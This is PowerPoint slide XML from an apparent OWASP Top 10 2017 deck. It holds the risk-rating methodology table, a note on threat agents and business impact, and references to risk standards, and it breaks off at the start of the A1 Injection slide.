        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Risk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Title 62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Application Security Risks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="69" name="Table 68"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2898979101"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="4953578"/>
          <a:ext cx="4495800" cy="4190422"/>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xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="336204">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What’s </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" u="sng" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>My</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Risk?</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3854218">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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4"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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focuses on identifying the most serious risks for a broad array of organizations. For each of these risks, we provide generic information about likelihood and technical impact using the following simple ratings scheme, which is based on the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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r>
                        <a:rPr lang="en-US"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a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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 this edition, we have changed the risk rating system around compared to previous version to assist with our ranking of likelihoods and impacts. This is not an issue within the document, but is clear in the public data analysis (see ‘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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+R</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="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Each organization is unique, and so are the threat actors for that organization, their goals, and the impact of any breach. If a public interest organization uses a CMS for public information and a health system uses that same exact CMS for sensitive health records, the threat actors and business impacts are very different for the same exact software. It is critical that you apply your custom threat agents and business impacts based upon the data asset criticality.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1"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en-US" sz="95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Where possible, the names of the risks in the Top 10 are aligned with CWE weaknesses to promote generally accepted security practices and to reduce confusion. </a:t>
                      </a:r>
                      <a:endPar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3732187056"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="76199" y="5989320"/>
          <a:ext cx="4367701" cy="1043940"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:tableStyleId>{B301B821-A1FF-4177-AEE7-76D212191A09}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="643467">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="764117">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="788400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="764117">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="763200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="644400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="152400">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Threat</a:t>
                      </a:r>
                    </a:p>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Agents</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Exploitability</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Prevalence</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Detectability</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Technical Impacts</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Impacts</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152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 Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"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800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Easy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Widespread</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="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i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="FEFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Easy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="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1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Severe</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="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1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="850" b="1"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Business Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="8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152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1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Average</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Common</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Average</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Moderate</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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xmlns="" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="152400">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Difficult</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Uncommon</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Difficult</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Minor</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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xmlns=""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3922201932"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4621087" y="4953000"/>
          <a:ext cx="2236914" cy="41910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xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="336291">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1">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References</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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3854709">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" kern="12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200" b="1" kern="12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endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" u="none" kern="12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950" u="none" kern="12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950" u="none" kern="12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rPr>
                        <a:t>Article on Threat/Risk Modeling</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" u="none" kern="12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000" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="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External</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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ISO 31000: Risk Management Std</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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27001: ISMS</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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NIST Cyber Framework (US)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"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ASD Strategic Mitigations (AU)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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NIST CVSS 3.0</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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Microsoft Threat Modelling Tool</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>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en-AU" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>OWASP Top 10 2017</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Application Security Risks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{41713193-AF8E-47ED-A0B1-8F6073105D9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-685800" y="990600"/>
            <a:ext cx="8153400" cy="8001000"/>
            <a:chOff x="-609600" y="990600"/>
            <a:chExt cx="8153400" cy="8001000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Rectangle 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1F5308A3-3666-418A-9AE6-240E4688F2BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-609600" y="990600"/>
              <a:ext cx="8153400" cy="8001000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Freeform 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{200BBCDD-13C0-4D97-9CEC-01B8726246D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="1071787"/>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Injection flaws, such as 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xmlns="" id="{77AB65A7-CD59-4B0C-BAB0-A853DD609B84}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="995312"/>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A1:2017 Injection</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9D11D811-BC41-418D-90D1-CD609B0626DA}"/>
                </a:ext>
              </a:extLst>
